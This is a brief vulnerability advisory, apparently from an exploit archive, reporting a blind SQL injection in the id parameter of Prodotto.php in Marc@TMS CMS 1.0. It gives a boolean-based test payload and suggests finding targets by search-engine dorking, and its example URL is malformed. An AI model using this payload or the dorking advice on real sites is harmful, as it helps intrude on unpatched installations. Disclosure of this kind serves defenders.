Headline
Marc@TMS CMS 1.0 SQL Injection
Marc@TMS CMS version 1.0 suffers from a remote SQL injection vulnerability.
=============================================================================================================================================| # Title : Marc@TMS cms v1.0 SQL injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) || # Vendor : http://www.web.cpzgroup.com/ |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : Prodotto.php?id=1202[+] https://www/127.0.0.1/demo/storeitalyit/modules_cms/Prodotto.php?id=1202 <=== inject here[+] --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1202 AND 5978=5978 ---Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================